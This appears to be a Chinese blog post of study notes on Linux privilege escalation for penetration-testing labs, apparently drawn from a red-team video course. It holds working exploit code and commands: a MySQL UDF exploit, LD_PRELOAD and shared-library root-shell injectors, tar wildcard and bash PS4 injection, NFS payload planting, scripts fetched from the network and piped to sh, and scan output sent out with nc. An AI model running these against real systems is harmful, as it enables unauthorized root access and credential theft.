<!DOCTYPE html><html lang="zh-CN" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Privilege Escalation | Terminal-001 | T3yT3y</title><link rel="icon" type="image/x-icon" href="/favicon.ico"><script>var config = {"root":"/","search":{"preload":false,"activeHolder":"Enter here","blurHolder":"Search","noResult":"Data \"$0\" not found"},"code":{"codeInfo":"$0 - $1 lines","copy":"copy","copyFinish":"copied","expand":"expand"}}</script><script src="//unpkg.com/mermaid@9.2.2/dist/mermaid.min.js"></script><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/brands.min.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/fontawesome.min.css"><link rel="stylesheet" href="/css/arknights.css"><link rel="stylesheet" href="//unpkg.com/@highlightjs/cdn-assets@11.7.0/styles/default.min.css"><script>if (window.localStorage.getItem('theme-mode') === 'light') document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark') document.documentElement.setAttribute('theme-mode', 'dark')</script><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.ttf");
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}
@font-face {
 font-family: 'Font Awesome 6 Brands';
 src: local('Font Awesome 6 Brands'), url('/lib/fontawesome/fa-brands.woff2') format('woff2');
}
@font-face {
 font-family: 'Font Awesome 6 Free';
 src: local('Font Awesome 6 Free'), url('/lib/fontawesome/fa-regular.woff2') format('woff2');
}</style><style>:root {
  --dark-background: url('https://ak.hypergryph.com/assets/index/images/ak/pc/bk.jpg');
  --light-background: url('/img/bk.jpg');
}</style><meta name="generator" content="Hexo 6.3.0"><link rel="stylesheet" href="/css/prism-duotone-dark.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head><body><div class="loading" style="opacity: 0"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><nav><div class="navBtn hide"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="Search" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li><li class="navItem"><a class="navBlock" href="/about/"><span class="navItemTitle">About</span></a></li></ol></nav></header><article><div id="post-bg"><div id="post-title"><h1>Privilege Escalation</h1><div id="post-info"><span>First Post: <div class="control"><time datetime="2023-05-23T16:29:19.562Z" id="date"> 2023-05-24</time></div></span><br><span>Last Update: <div class="control"><time datetime="2023-05-23T16:29:23.018Z" id="updated"> 2023-05-24</time></div></span><br><span>Word Count: <div class="control">2.5k</div></span><br><span>Read Time: <div class="control">11 min</div></span></div></div><hr><div id="post-content"><p class='item-img' data-src='/pic/20230422224529.png'><img src="/pic/20230422224529.png" alt="20230422224529"></p>
<span id="more"></span>

<h1 id="Privilege-Escalation"><a href="#Privilege-Escalation" class="headerlink" title="Privilege Escalation"></a>Privilege Escalation</h1><p>整理自B站up<a target="_blank" rel="noopener" href="https://space.bilibili.com/491748397">红队笔记</a>的提权精讲</p>
<h2 id="Linux-Priv-Esca"><a href="#Linux-Priv-Esca" class="headerlink" title="Linux Priv Esca"></a>Linux Priv Esca</h2><p>最常用：</p>
<ul>
<li>ugo</li>
<li>suid sgid</li>
<li>Capabilities</li>
<li>AppArmor Selinux</li>
<li>ACL</li>
</ul>
<p>用的也比较多的：</p>
<ul>
<li><p>Grsecurity</p>
</li>
<li><p>Pax</p>
</li>
<li><p>ExecShield</p>
</li>
<li><p>ASLR</p>
</li>
<li><p>TOMOYO Linux</p>
</li>
<li><p>SMACK</p>
</li>
<li><p>Yama</p>
</li>
<li><p>CGroups</p>
</li>
<li><p>Linux Namespaces</p>
</li>
<li><p>StackGuard</p>
</li>
<li><p>Proplice</p>
</li>
<li><p>seccomp</p>
</li>
<li><p>Ptrace</p>
</li>
<li><p>capsicum</p>
</li>
<li><p>Mprotect</p>
</li>
<li><p>chroot</p>
</li>
<li><p>firejail</p>
</li>
</ul>
<h3 id="手动枚举"><a href="#手动枚举" class="headerlink" title="手动枚举"></a>手动枚举</h3><p>用户信息：</p>
<ul>
<li>whoami</li>
<li>id</li>
<li>w&#x2F;who 查看其他登录用户</li>
<li>last 最近登录用户以及一些操作</li>
</ul>
<p>内核版本信息：</p>
<ul>
<li>uname -a</li>
<li>lsb_release -a 更多信息</li>
<li>cat &#x2F;proc&#x2F;version 进程信息查看版本</li>
<li>cat &#x2F;etc&#x2F;issue</li>
<li>hostnamectl</li>
</ul>
<p>网络信息：</p>
<ul>
<li>ip a</li>
<li>ifconfig 老机子</li>
<li>ip route 查看路由表信息</li>
<li>ip neigh 查看网络邻居</li>
<li>arp -a</li>
</ul>
<p>用户权限：</p>
<ul>
<li>sudo -l</li>
<li>getcap -r &#x2F; 2&gt;&#x2F;dev&#x2F;null</li>
<li>history 查看历史命令</li>
<li>cat &#x2F;etc&#x2F;passwd</li>
<li>cat cat &#x2F;etc&#x2F;shadow</li>
<li>cat &#x2F;etc&#x2F;crontab</li>
<li>echo $PATH</li>
<li>env 查看整体环境</li>
<li>ps -ef  entire full list</li>
<li>ps axjf  x-没有连接到终端的进程 j-查看进程树 a-all</li>
<li>ps aux u-显示启动进程的用户</li>
<li>top 查看实时更新的进程信息 top -n 1 只刷一次</li>
<li>netstat -a </li>
<li>netstat -l 显示正在监听的</li>
<li>find &#x2F; -type f -perm -04000 2&gt;&#x2F;dev&#x2F;null  或者（find &#x2F; -type f -perm -u&#x3D;s 2&gt;&#x2F;dev&#x2F;null）</li>
<li>which 查询可执行文件</li>
<li>cat &#x2F;etc&#x2F;fstab 查看未挂载磁盘（系统运维备份常临时挂载一块磁盘，当使用时再挂载，不使用时就卸掉）</li>
</ul>
<h3 id="自动枚举"><a href="#自动枚举" class="headerlink" title="自动枚举"></a>自动枚举</h3><ul>
<li><p>大招：linpeas </p>
<ul>
<li>推荐：<code>curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh </code> 通过管道符执行，不保留文件到本地。</li>
<li>将扫描结果传回本地查看 <code>curl &lt;serverIP&gt;/linpeas.sh | sh | nc &lt;kaliIP&gt; &lt;port&gt;</code>  kali: <code>nc -lvnp &lt;port&gt; | tee name.txt</code> tee 既又在标准输出中显示，又保存到txt文件中。txt文件可以用less -r 查看。</li>
<li>靶机没有curl。kali：<code>sudo nc -lvnp &lt;port&gt; &lt; linpeas.sh</code> victim:<code>cat &lt; /dev/tcp/&lt;kaliIP&gt;/&lt;port&gt; | sh </code></li>
</ul>
</li>
<li><p>linEnum</p>
</li>
<li><p>LSE</p>
</li>
<li><p>LES</p>
</li>
<li><p>linuxprivchecker.py</p>
</li>
<li><p>unix-privsec-check</p>
</li>
</ul>
<h3 id="Trick"><a href="#Trick" class="headerlink" title="Trick"></a>Trick</h3><h4 id="shell的稳定"><a href="#shell的稳定" class="headerlink" title="shell的稳定"></a>shell的稳定</h4><pre class="line-numbers language-bash"><code class="language-bash">python -c <span class="token string">"import pty; pty.spawn('/bin/bash')"</span>
stty raw -echo <span class="token comment" spellcheck="true">#raw 格式输出并关闭echo导致的命令显示两次</span>
<span class="token function">export</span> TERM<span class="token operator">=</span>xterm-color
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p><code>rlwrap nc -lvnp 443</code>用readlinewrap将我们的反弹shell包裹起来，防止上下翻历史记录时出现问题。</p>
<h3 id="常用方法"><a href="#常用方法" class="headerlink" title="常用方法"></a>常用方法</h3><h4 id="bash-version"><a href="#bash-version" class="headerlink" title="bash version"></a>bash version</h4><ul>
<li><code>ver&lt;4.2</code>存在漏洞可以利用：可以在bash中定义函数并用路径组合做文件名。</li>
<li><code>ver&lt;4.4</code>存在漏洞可以利用：环境变量插入。</li>
</ul>
<h4 id="MySQL-udf"><a href="#MySQL-udf" class="headerlink" title="MySQL udf"></a>MySQL udf</h4><p>MySQL user defined function.</p>
<h5 id="提权条件"><a href="#提权条件" class="headerlink" title="提权条件"></a>提权条件</h5><ol>
<li><p>有mysql账号，且有增删改查权限。最好有mysql root账号。</p>
</li>
<li><p>secure_file_priv 最好要为空，或者其指定目录能够利用。（该属性限定Load data、select into outfile、load_file()等操作）。（通过<code>show variables like &#39;%secure_file_priv%&#39;</code>查看）</p>
</li>
</ol>
<h5 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h5><p>主要操作：写入’plugin’中。（<code>show variables like &#39;%plugin%&#39;</code>查到的目录）</p>
<p>其他步骤在exp中有。</p>
<pre class="line-numbers language-c"><code class="language-c"><span class="token comment" spellcheck="true">/*
 * $Id: raptor_udf2.c,v 1.1 2006/01/18 17:58:54 raptor Exp $
 *
 * raptor_udf2.c - dynamic library for do_system() MySQL UDF
 * Copyright (c) 2006 Marco Ivaldi &lt;raptor@0xdeadbeef.info>
 *
 * This is an helper dynamic library for local privilege escalation through
 * MySQL run with root privileges (very bad idea!), slightly modified to work 
 * with newer versions of the open-source database. Tested on MySQL 4.1.14.
 *
 * See also: http://www.0xdeadbeef.info/exploits/raptor_udf.c
 *
 * Starting from MySQL 4.1.10a and MySQL 4.0.24, newer releases include fixes
 * for the security vulnerabilities in the handling of User Defined Functions
 * (UDFs) reported by Stefano Di Paola &lt;stefano.dipaola@wisec.it>. For further
 * details, please refer to:
 *
 * http://dev.mysql.com/doc/refman/5.0/en/udf-security.html
 * http://www.wisec.it/vulns.php?page=4
 * http://www.wisec.it/vulns.php?page=5
 * http://www.wisec.it/vulns.php?page=6
 *
 * "UDFs should have at least one symbol defined in addition to the xxx symbol 
 * that corresponds to the main xxx() function. These auxiliary symbols 
 * correspond to the xxx_init(), xxx_deinit(), xxx_reset(), xxx_clear(), and 
 * xxx_add() functions". -- User Defined Functions Security Precautions 
 *
 * Usage:
 * $ id
 * uid=500(raptor) gid=500(raptor) groups=500(raptor)
 * $ gcc -g -c raptor_udf2.c
 * $ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
 * $ mysql -u root -p
 * Enter password:
 * [...]
 * mysql> use mysql;
 * mysql> create table foo(line blob);
 * mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
 * mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
 * mysql> create function do_system returns integer soname 'raptor_udf2.so';
 * mysql> select * from mysql.func;
 * +-----------+-----+----------------+----------+
 * | name      | ret | dl             | type     |
 * +-----------+-----+----------------+----------+
 * | do_system |   2 | raptor_udf2.so | function |
 * +-----------+-----+----------------+----------+
 * mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
 * mysql> \! sh
 * sh-2.05b$ cat /tmp/out
 * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
 * [...]
 *
 * E-DB Note: Keep an eye on https://github.com/mysqludf/lib_mysqludf_sys
 *
 */</span>

<span class="token macro property">#<span class="token directive keyword">include</span> <span class="token string">&lt;stdio.h></span></span>
<span class="token macro property">#<span class="token directive keyword">include</span> <span class="token string">&lt;stdlib.h></span></span>

<span class="token keyword">enum</span> Item_result <span class="token operator">&amp;</span>#<span class="token number">123</span><span class="token punctuation">;</span>STRING_RESULT<span class="token punctuation">,</span> REAL_RESULT<span class="token punctuation">,</span> INT_RESULT<span class="token punctuation">,</span> ROW_RESULT<span class="token operator">&amp;</span>#<span class="token number">125</span><span class="token punctuation">;</span><span class="token punctuation">;</span>

<span class="token keyword">typedef</span> <span class="token keyword">struct</span> st_udf_args <span class="token operator">&amp;</span>#<span class="token number">123</span><span class="token punctuation">;</span>
    <span class="token keyword">unsigned</span> <span class="token keyword">int</span>		arg_count<span class="token punctuation">;</span>	<span class="token comment" spellcheck="true">// number of arguments</span>
    <span class="token keyword">enum</span> Item_result	<span class="token operator">*</span>arg_type<span class="token punctuation">;</span>	<span class="token comment" spellcheck="true">// pointer to item_result</span>
    <span class="token keyword">char</span> 			<span class="token operator">*</span><span class="token operator">*</span>args<span class="token punctuation">;</span>		<span class="token comment" spellcheck="true">// pointer to arguments</span>
    <span class="token keyword">unsigned</span> <span class="token keyword">long</span>		<span class="token operator">*</span>lengths<span class="token punctuation">;</span>	<span class="token comment" spellcheck="true">// length of string args</span>
    <span class="token keyword">char</span>			<span class="token operator">*</span>maybe_null<span class="token punctuation">;</span>	<span class="token comment" spellcheck="true">// 1 for maybe_null args</span>
<span class="token operator">&amp;</span>#<span class="token number">125</span><span class="token punctuation">;</span> UDF_ARGS<span class="token punctuation">;</span>

<span class="token keyword">typedef</span> <span class="token keyword">struct</span> st_udf_init <span class="token operator">&amp;</span>#<span class="token number">123</span><span class="token punctuation">;</span>
    <span class="token keyword">char</span>			maybe_null<span class="token punctuation">;</span>	<span class="token comment" spellcheck="true">// 1 if func can return NULL</span>
    <span class="token keyword">unsigned</span> <span class="token keyword">int</span>		decimals<span class="token punctuation">;</span>	<span class="token comment" spellcheck="true">// for real functions</span>
    <span class="token keyword">unsigned</span> <span class="token keyword">long</span> 		max_length<span class="token punctuation">;</span>	<span class="token comment" spellcheck="true">// for string functions</span>
    <span class="token keyword">char</span>			<span class="token operator">*</span>ptr<span class="token punctuation">;</span>		<span class="token comment" spellcheck="true">// free ptr for func data</span>
    <span class="token keyword">char</span>			const_item<span class="token punctuation">;</span>	<span class="token comment" spellcheck="true">// 0 if result is constant</span>
<span class="token operator">&amp;</span>#<span class="token number">125</span><span class="token punctuation">;</span> UDF_INIT<span class="token punctuation">;</span>

<span class="token keyword">int</span> <span class="token function">do_system</span><span class="token punctuation">(</span>UDF_INIT <span class="token operator">*</span>initid<span class="token punctuation">,</span> UDF_ARGS <span class="token operator">*</span>args<span class="token punctuation">,</span> <span class="token keyword">char</span> <span class="token operator">*</span>is_null<span class="token punctuation">,</span> <span class="token keyword">char</span> <span class="token operator">*</span>error<span class="token punctuation">)</span>
<span class="token operator">&amp;</span>#<span class="token number">123</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span>args<span class="token operator">-></span>arg_count <span class="token operator">!=</span> <span class="token number">1</span><span class="token punctuation">)</span>
        <span class="token keyword">return</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

    <span class="token function">system</span><span class="token punctuation">(</span>args<span class="token operator">-></span>args<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

    <span class="token keyword">return</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token operator">&amp;</span>#<span class="token number">125</span><span class="token punctuation">;</span>

<span class="token keyword">char</span> <span class="token function">do_system_init</span><span class="token punctuation">(</span>UDF_INIT <span class="token operator">*</span>initid<span class="token punctuation">,</span> UDF_ARGS <span class="token operator">*</span>args<span class="token punctuation">,</span> <span class="token keyword">char</span> <span class="token operator">*</span>message<span class="token punctuation">)</span>
<span class="token operator">&amp;</span>#<span class="token number">123</span><span class="token punctuation">;</span>
    <span class="token keyword">return</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token operator">&amp;</span>#<span class="token number">125</span><span class="token punctuation">;</span>

<span class="token comment" spellcheck="true">// milw0rm.com [2006-02-20]</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h4 id="x2F-etc-x2F-shadow"><a href="#x2F-etc-x2F-shadow" class="headerlink" title="&#x2F;etc&#x2F;shadow"></a>&#x2F;etc&#x2F;shadow</h4><p>什么时候用：手动枚举发现可读写，历史命令发现当前账号进行过操作。</p>
<ul>
<li>可读：用john破解</li>
<li>可写：直接写入(使用<code>mkpasswd -m sha-512</code> 生成对应格式的hash值填入)</li>
</ul>
<h4 id="x2F-etc-x2F-passwd"><a href="#x2F-etc-x2F-passwd" class="headerlink" title="&#x2F;etc&#x2F;passwd"></a>&#x2F;etc&#x2F;passwd</h4><p>可写：<code>openssl passwd &lt;passwd&gt;</code></p>
<h4 id="sudo-环境变量提权"><a href="#sudo-环境变量提权" class="headerlink" title="sudo 环境变量提权"></a>sudo 环境变量提权</h4><p><code>sudo -l</code>发现存在环境变量<code>env_keep+=LD_PRELOADS</code>(LD&#x3D;link dynamic动态链接库)</p>
<pre class="line-numbers language-c"><code class="language-c"><span class="token comment" spellcheck="true">/* shell.c 
/* 
/* -fPIC place indepedent code
/* 还需要以root权限执行一个命令（随便）随后就能在命令执行前预先执行动态链接库生成新
/* 的root bash实现提权
/* gcc -fPIC -shared -o shell.so shell.c -nostartfiles
/* sudo LD_PRELOAD=/tmp/shell.so &lt;rootcommand>
*/</span>

<span class="token macro property">#<span class="token directive keyword">include</span> <span class="token string">&lt;stdio.h></span></span>
<span class="token macro property">#<span class="token directive keyword">include</span> <span class="token string">&lt;sys/types.h></span> </span><span class="token comment" spellcheck="true">//数据类型库</span>
<span class="token macro property">#<span class="token directive keyword">include</span> <span class="token string">&lt;stdlib.h></span></span>

<span class="token function">void_init</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token operator">&amp;</span>#<span class="token number">123</span><span class="token punctuation">;</span>
    <span class="token function">unsetenv</span><span class="token punctuation">(</span><span class="token string">"LD_PRELOAD"</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment" spellcheck="true">//执行一次就卸掉链接库</span>
    <span class="token function">setgid</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">setuid</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">system</span><span class="token punctuation">(</span><span class="token string">"/bin/bash"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    
<span class="token operator">&amp;</span>#<span class="token number">125</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h4 id="自动任务"><a href="#自动任务" class="headerlink" title="自动任务"></a>自动任务</h4><ul>
<li><p>自动任务文件可写</p>
<p><code>cat /etc/crontab</code></p>
<p><code>ls -la /etc | grep cron*</code></p>
</li>
<li><p>环境变量路径可写且自动任务相对路径</p>
<p>可写入crontab中$PATH变量中较前的路径。</p>
<p>如果自动任务不是绝对路径，我们可以在较前的路径构造同名文件，实现劫持自动任务执行提权。</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token shebang important">#!/bin/bash</span>
<span class="token function">cp</span> /bin/bash /tmp/rootbash
<span class="token function">chmod</span> +xs /tmp/rootbash
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
</li>
<li><p>自动任务通配符提权</p>
<p>如果存在使用<code>tar &lt;target&gt; *</code>自动打包的自动任务</p>
<p>我们可以通过<code>--checkpoint-action</code>利用</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token function">touch</span> <span class="token operator">&lt;</span>tar target<span class="token operator">></span>/--checkpoint<span class="token operator">=</span>1
<span class="token function">touch</span> <span class="token operator">&lt;</span>tar target<span class="token operator">></span>/--checkpoint-action<span class="token operator">=</span>exec<span class="token operator">=</span>shell.elf
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
</li>
</ul>
<h4 id="SUID"><a href="#SUID" class="headerlink" title="SUID"></a>SUID</h4><p><code>find / -type f -perm -u=s -ls 2&gt;/dev/null</code></p>
<p>发现不常见的suid文件，我们可以使用<code>strings</code>查看其中字符串，<code>strace</code>以便后面利用。</p>
<h5 id="可执行文件"><a href="#可执行文件" class="headerlink" title="可执行文件"></a>可执行文件</h5><p>直接gtfobins</p>
<h5 id="共享库注入提权"><a href="#共享库注入提权" class="headerlink" title="共享库注入提权"></a>共享库注入提权</h5><p><code>so</code>文件</p>
<p>使用<code>strings</code>查看<code>suid</code>文件中可识别字符串发现使用到了<code>so</code>库文件</p>
<p>使用<code>strace</code>追踪，使用<code>2&gt;&amp;1</code>将错误信息重定向到标准输出</p>
<p>看他需要什么共享库，我们给他写一个</p>
<pre class="line-numbers language-c"><code class="language-c"><span class="token comment" spellcheck="true">/* lib.c 
/* gcc -fPIC -shared -o lib.so lib.c
*/</span>

<span class="token macro property">#<span class="token directive keyword">include</span> <span class="token string">&lt;stdio.h></span></span>
<span class="token macro property">#<span class="token directive keyword">include</span> <span class="token string">&lt;stdlib.h></span></span>

<span class="token keyword">static</span> <span class="token keyword">void</span> <span class="token function">inject</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token function">__attribute__</span><span class="token punctuation">(</span><span class="token punctuation">(</span>constructor<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token keyword">void</span> <span class="token function">inject</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token operator">&amp;</span>#<span class="token number">123</span><span class="token punctuation">;</span>
    <span class="token function">setgid</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">setuid</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">system</span><span class="token punctuation">(</span><span class="token string">"/bin/bash -p"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    
<span class="token operator">&amp;</span>#<span class="token number">125</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h5 id="环境变量利用"><a href="#环境变量利用" class="headerlink" title="环境变量利用"></a>环境变量利用</h5><p>用<code>strings</code>查看suid文件时时发现其中使用相对路径而非绝对路径。</p>
<p>直接起一个一样的名字给他劫持掉。</p>
<pre class="line-numbers language-c"><code class="language-c"><span class="token comment" spellcheck="true">/* sameName.c 
/* gcc -o sameName sameName.c
/* export PATH=.:$PATH
*/</span>

<span class="token macro property">#<span class="token directive keyword">include</span> <span class="token string">&lt;stdio.h></span></span>
<span class="token macro property">#<span class="token directive keyword">include</span> <span class="token string">&lt;stdlib.h></span></span>


<span class="token keyword">void</span> <span class="token function">main</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token operator">&amp;</span>#<span class="token number">123</span><span class="token punctuation">;</span>
    <span class="token function">setgid</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">setuid</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">system</span><span class="token punctuation">(</span><span class="token string">"/bin/bash -p"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    
<span class="token operator">&amp;</span>#<span class="token number">125</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h5 id="SUID-shell-功能提权"><a href="#SUID-shell-功能提权" class="headerlink" title="SUID-shell 功能提权"></a>SUID-shell 功能提权</h5><ul>
<li><p><code>bash --version</code>小于4.2</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token keyword">function</span> /usr/sbin/service <span class="token operator">&amp;</span><span class="token comment" spellcheck="true">#123; /bin/bash -p; &amp;#125;</span>
<span class="token function">export</span> -f /usr/sbin/service //导出函数以劫持
// 此处执行suid文件
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
</li>
<li><p><code>bash --version</code>小于4.4</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true"># env 设置环境变量</span>
<span class="token comment" spellcheck="true"># -i 忽略现有的环境变量 </span>
<span class="token comment" spellcheck="true"># SHELLOPTS=xtrace用于命令执行前将其打印并插入其他语句</span>
<span class="token comment" spellcheck="true"># PS4 指定提示符</span>
<span class="token function">env</span> -i SHELLOPTS<span class="token operator">=</span>xtrace PS4<span class="token operator">=</span><span class="token string">'<span class="token variable"><span class="token variable">$(</span><span class="token function">cp</span> /bin/bash /tmp/rootbash<span class="token punctuation">;</span><span class="token function">chmod</span> +xs /tmp/rootbash<span class="token variable">)</span></span>'</span> <span class="token operator">&lt;</span>any <span class="token function">file</span> <span class="token keyword">set</span> suid<span class="token operator">></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
</li>
</ul>
<h4 id="密码和密钥历史"><a href="#密码和密钥历史" class="headerlink" title="密码和密钥历史"></a>密码和密钥历史</h4><ul>
<li>用<code>history</code>查看历史记录中是否遗留着密码</li>
<li><code>cat ~/.*history | less</code>用less列出当前用户家目录下所有与history相关的文件</li>
<li>如果<code>viminfo</code>可以查看， 里面可能存在编辑时留下的密钥信息</li>
<li>查看各种vpn配置文件(.ovpn)，网页配置文件(wp-config.php)等</li>
<li>根目录下<code>.ssh</code>文件夹中可能存在私钥</li>
</ul>
<h4 id="NFS提权"><a href="#NFS提权" class="headerlink" title="NFS提权"></a>NFS提权</h4><p>NFS &#x3D; Network File System 常用于网络上文件共享。NFS即可用于获取初步立足点，也可用于提权。信息收集时要注意（一般绑在RPC端口上）。</p>
<ol>
<li><p><code>cat /etc/exports</code> 查看NFS具体配置。如果有<code>no_root_squash</code>选项，很可能可以用于提权。</p>
</li>
<li><p>在攻击机上挂载一下</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token function">mkdir</span> /tmp/nfs

<span class="token function">mount</span> -o rw,vers<span class="token operator">=</span>3 <span class="token operator">&lt;</span>nfsip:/tmp<span class="token operator">></span> /tmp/nfs <span class="token comment" spellcheck="true">#&lt;nfsip:/tmp>在配置文件中得来</span>

<span class="token function">cd</span> /tmp/nfs 

<span class="token function">su</span>
<span class="token comment" spellcheck="true"># 以root身份向其中插入我们的reverse shell</span>
msfvenom -p linux/x86/exec CMD<span class="token operator">=</span><span class="token string">"/bin/bash -p"</span> -f elf -o /tmp/nfs/shell.elf
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
</li>
<li><p>在靶机中执行即可</p>
</li>
</ol>
<h4 id="内核提权"><a href="#内核提权" class="headerlink" title="内核提权"></a>内核提权</h4><p>必须提一嘴，内核提权不太稳定，很容易搞崩机子，使用前要三思。此外，内核提权和抽奖挺像，要有耐心，选择有效的exp最关键。没有注释的exp慎用。</p>
<p>dirtyCow不是很稳定。</p>
<p>Linux Kernal 2.6有一个著名的内核提权漏洞<a target="_blank" rel="noopener" href="https://www.exploit-db.com/exploits/8478">UDEV</a>。</p>
<h4 id="doas-less-vi提权"><a href="#doas-less-vi提权" class="headerlink" title="doas less + vi提权"></a>doas less + vi提权</h4><ul>
<li><code>find / -perm -u=s -type f 2&gt;/dev/null</code></li>
<li>在openBSD等一部分系统中，会用到doas作为特权操作，如果当前用户有操作doas的权限，可以考虑提权。</li>
<li><code>cat /etc/doas.conf</code> 查看不需要密码执行的doas操作。</li>
<li>如果可以使用less，那我们在less中可以按v进入vi编辑模式以root权限进行文件操作。</li>
<li>在vi模式中<code>:!sh</code>可以起一个新的shell，doas root则是root shell。</li>
</ul>
<h4 id="利用MOTD机制提权"><a href="#利用MOTD机制提权" class="headerlink" title="利用MOTD机制提权"></a>利用MOTD机制提权</h4><p> motd &#x3D; message of the day</p>
<ul>
<li><code>cd /etc/update-motd.d/ ; ls -la</code></li>
<li><code>cat /etc/00-header</code></li>
<li>如果可编辑则写入反弹shell或者其他提权语句都可。</li>
</ul>
<h4 id="可预测PRNG暴力破解SSH提权"><a href="#可预测PRNG暴力破解SSH提权" class="headerlink" title="可预测PRNG暴力破解SSH提权"></a>可预测PRNG暴力破解SSH提权</h4><p>prng &#x3D; pseudo random number generator</p>
<p>如果拿到了ssh公钥，可以考虑使用伪随机数生成器暴力碰撞破解。</p>
<p>可以在searchsploit中查找<code>prng</code>但是要注意openssl版本。</p>
<p>下载下来公私钥库后 直接选择拿到公钥的一部分 grep -lr 递归列举文件搜索，找到对应的公私钥对。</p>
